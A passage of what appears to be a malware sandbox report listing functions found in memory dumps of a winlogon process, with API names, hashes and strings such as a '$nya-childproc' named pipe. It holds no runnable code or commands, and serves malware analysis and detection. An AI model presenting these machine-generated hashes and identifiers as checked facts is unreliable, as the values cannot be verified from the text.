                                            • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction Fuzzy Hash: E8D18B73A447888AFB22DF659540BDD7BA0FB4979DF900205EE8957B96CB35C480C783
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                            • String ID: d
                                            • API String ID: 3743429067-2564639436
                                            • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction ID: 2003d48ef077ee33f5376efef2558062a00fd4140dc90c64e07b1c00940d858d
                                            • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction Fuzzy Hash: 6541B133614B84DAF761CF22E44479E77A1F788B89F808119DA890B758DF3DC44ACB92
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                            • String ID: d
                                            • API String ID: 3743429067-2564639436
                                            • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction ID: 8a4b5a10e027ae3e9ee44e0ca111a6274b15f8be53a4c776a450907aef51b4fb
                                            • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction Fuzzy Hash: 9A41A133614B88C6F761CF21E44479EB7A1F788B98F848119EA8907758DF3ED446CB92
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                            • String ID: d
                                            • API String ID: 3743429067-2564639436
                                            • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction ID: 6f63e4c53f789b41bcef94283b1f03cc38c3850ef35568dd7831dedf23a81aa2
                                            • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction Fuzzy Hash: 9A41D073614B84CAF761CF21E404B9E77A1F788B89F808129DA8947758DF39C585CB82
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                            • String ID: \\.\pipe\$nya-childproc
                                            • API String ID: 166002920-3933612297
                                            • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction ID: b17e47fd4f1449c8d4acc04e3621050a468f068c5ba762e4a054dfaa74389b3f
                                            • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction Fuzzy Hash: BA116D32A18B5482F7118B21F41479B7760FB88BA8F944215EA5906AA8DF3DC146CBC2
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                            • String ID: \\.\pipe\$nya-childproc
                                            • API String ID: 166002920-3933612297
                                            • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction ID: 4ae2b1dd0165a769ae8a6f1806b14cc66bc568eb7fc37f487b2a6e2550b0d5b4
                                            • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction Fuzzy Hash: 6D117F32A18B4482F7118B21F854B997760FB88BD8FD44314EA5906AA8CF3DC146CBC6
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                            • String ID: \\.\pipe\$nya-childproc
                                            • API String ID: 166002920-3933612297
                                            • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction ID: 60ccf5d49717dcd0a93c838fa48479b51da98688de155bc44fd090f9c66e7f12
                                            • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction Fuzzy Hash: 0E117C32A15B4482F7118B21F464B9A7760FB88BD8F940314EA5942AA8DF3DC145CB86
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000003.1732974344.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_3_1ca7d1b0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction ID: 24616cbd0e12550494a136588df692ffe9cf0816aba21efa28764c3b263d334b
                                            • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction Fuzzy Hash: 8881CF73F8434C46FA53AB6D9841BD93291BF8678CFD45025998C47396DA3BC882C783
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction ID: c017a9effcea72d85198735e9016d59a6dfb2979d59511daea1fd325c26afa1d
                                            • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction Fuzzy Hash: BF81D373E8034846FA53AB659441FD97290BF8578EFC840259A8877396DB3BC84787C3
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction ID: 2ef598056096b3bfdeabdf0bab39421e006454b166941b32e9cc3945e4c11726
                                            • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction Fuzzy Hash: AB817133E8034C96FA52AB659481BD97291BFC578CFD4C02DA98947796DB3BC84782C3
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction ID: 160e4b4da880ada073ff2f6592a37a3a82ede2845789ae4f7ceb2b1831bb5f15
                                            • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction Fuzzy Hash: 4581E533E8034D46FA53AB659441FE97291BF8578EFC44114A98947796EB3BC846C3C3
                                            APIs
                                            • LoadLibraryExW.KERNEL32(?,?,?,000001CA7D299C6B,?,?,?,000001CA7D29945C,?,?,?,?,000001CA7D298F65), ref: 000001CA7D299B31
                                            • GetLastError.KERNEL32(?,?,?,000001CA7D299C6B,?,?,?,000001CA7D29945C,?,?,?,?,000001CA7D298F65), ref: 000001CA7D299B3F
                                            • LoadLibraryExW.KERNEL32(?,?,?,000001CA7D299C6B,?,?,?,000001CA7D29945C,?,?,?,?,000001CA7D298F65), ref: 000001CA7D299B69
                                            • FreeLibrary.KERNEL32(?,?,?,000001CA7D299C6B,?,?,?,000001CA7D29945C,?,?,?,?,000001CA7D298F65), ref: 000001CA7D299BD7
                                            • GetProcAddress.KERNEL32(?,?,?,000001CA7D299C6B,?,?,?,000001CA7D29945C,?,?,?,?,000001CA7D298F65), ref: 000001CA7D299BE3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                            • String ID: api-ms-
                                            • API String ID: 2559590344-2084034818
                                            • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction ID: 45fd29a1b6800a1b48e2dad99402234d17b04da49f1f4772e7c302736c8b9013
                                            • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction Fuzzy Hash: 1531B073A5270881FE13DB069810BE63398FF88BA9FA915249D1D5A794DA3EC44683C3
                                            APIs
                                            • LoadLibraryExW.KERNEL32(?,?,?,000001CA7D219C6B,?,?,?,000001CA7D21945C,?,?,?,?,000001CA7D218F65), ref: 000001CA7D219B31
                                            • GetLastError.KERNEL32(?,?,?,000001CA7D219C6B,?,?,?,000001CA7D21945C,?,?,?,?,000001CA7D218F65), ref: 000001CA7D219B3F
                                            • LoadLibraryExW.KERNEL32(?,?,?,000001CA7D219C6B,?,?,?,000001CA7D21945C,?,?,?,?,000001CA7D218F65), ref: 000001CA7D219B69
                                            • FreeLibrary.KERNEL32(?,?,?,000001CA7D219C6B,?,?,?,000001CA7D21945C,?,?,?,?,000001CA7D218F65), ref: 000001CA7D219BD7
                                            • GetProcAddress.KERNEL32(?,?,?,000001CA7D219C6B,?,?,?,000001CA7D21945C,?,?,?,?,000001CA7D218F65), ref: 000001CA7D219BE3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                            • String ID: api-ms-
                                            • API String ID: 2559590344-2084034818
                                            • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction ID: 913e52812023985531484c69a56f4c057774ccded8e0e9709dbdd399596a43e9
                                            • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction Fuzzy Hash: 0731A333A5274881FE13DB069800BE53395BF44BA8FA98528AD2946794DE3BD54683C3
                                            APIs
                                            • LoadLibraryExW.KERNEL32(?,?,?,000001CA7D1E9C6B,?,?,?,000001CA7D1E945C,?,?,?,?,000001CA7D1E8F65), ref: 000001CA7D1E9B31
                                            • GetLastError.KERNEL32(?,?,?,000001CA7D1E9C6B,?,?,?,000001CA7D1E945C,?,?,?,?,000001CA7D1E8F65), ref: 000001CA7D1E9B3F
                                            • LoadLibraryExW.KERNEL32(?,?,?,000001CA7D1E9C6B,?,?,?,000001CA7D1E945C,?,?,?,?,000001CA7D1E8F65), ref: 000001CA7D1E9B69
                                            • FreeLibrary.KERNEL32(?,?,?,000001CA7D1E9C6B,?,?,?,000001CA7D1E945C,?,?,?,?,000001CA7D1E8F65), ref: 000001CA7D1E9BD7
                                            • GetProcAddress.KERNEL32(?,?,?,000001CA7D1E9C6B,?,?,?,000001CA7D1E945C,?,?,?,?,000001CA7D1E8F65), ref: 000001CA7D1E9BE3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                            • String ID: api-ms-
                                            • API String ID: 2559590344-2084034818
                                            • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction ID: e67ff9930da721277ed07b841fc38b7938dfad7609e3bd6cb6fbc50ffe571c68
                                            • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction Fuzzy Hash: C331B033A5674881FE139B429800FE53394FF44BA9F990624DD194B794EF3AC4448393
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                            • String ID: CONOUT$
                                            • API String ID: 3230265001-3130406586
                                            • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                            • Instruction ID: 629538001b049afcf998d84a33afb03470eae8d162f95f7716f0bf9cb29571b7
                                            • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                            • Instruction Fuzzy Hash: 99119333B54B4482F7528B52E854B5A76A0FBC8BE8F844214EE5D8BB94DF7AC40587C2
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                            • String ID: CONOUT$
                                            • API String ID: 3230265001-3130406586
                                            • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                            • Instruction ID: 8aae48f47a9bb66e9edd86841ba13e019cb2a79eb4afd0458ea2895297c6a3c3
                                            • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                            • Instruction Fuzzy Hash: 8511B132B54B4482F3528B52F854B5976A4FB88BE8F814214EA5D87B94CF3AC50187C6
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                            • String ID: CONOUT$
                                            • API String ID: 3230265001-3130406586
                                            • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                            • Instruction ID: 05e9dde98ab0eb027feff401db16e6f2a0fc78696a85aafa316188426943b24b
                                            • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                            • Instruction Fuzzy Hash: AE119332B50B4482F7528B52E854B9976A0FB88BE8F844214EE5E87B94DF3AC50487C6
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
                                            • API ID: Thread$Current$Context
                                            • String ID:
                                            • API String ID: 1666949209-0
                                            • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction ID: 3ffafa6e12e7f3b91adaa85c96a8f4b7dc5847d6796292c8cf60de481045626f
                                            • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction Fuzzy Hash: 21D1EC37644B8C81EA71DB0AE49079A77A0FBC8B89F500112EACD577A5DF3DC542CB86
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                            • Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd
                                            Similarity
                                            • API ID: Thread$Current$Context
                                            • String ID:
                                            • API String ID: 1666949209-0
                                            • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction ID: 813dea70fcca1b133d49793039452a6eb6565c05de3bdde15a2486de481bcc61
                                            • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction Fuzzy Hash: A1D1CA37644B8C81EA71DB0AE49079E77A0F788B89F504116EACD477A4CF3EC542CB86
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
